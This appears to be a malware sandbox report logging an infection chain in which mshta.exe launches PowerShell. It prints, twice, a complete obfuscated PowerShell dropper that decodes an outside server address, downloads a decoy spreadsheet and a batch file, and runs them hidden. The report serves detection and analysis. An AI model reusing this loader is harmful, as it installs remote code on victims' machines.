Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_036A75CF push cs; iretd 1_2_036A75D2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_036A759D push cs; iretd 1_2_036A75C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_036A7B7B push ss; iretd 1_2_036A7B8A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_02F212D8 push esp; retf 0002h10_2_02F212E1

Hooking and other Techniques for Hiding and Protection

barindex
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 7287
Source: unknownNetwork traffic detected: HTTP traffic on port 7287 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 7287
Source: unknownNetwork traffic detected: HTTP traffic on port 7287 -> 49731
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
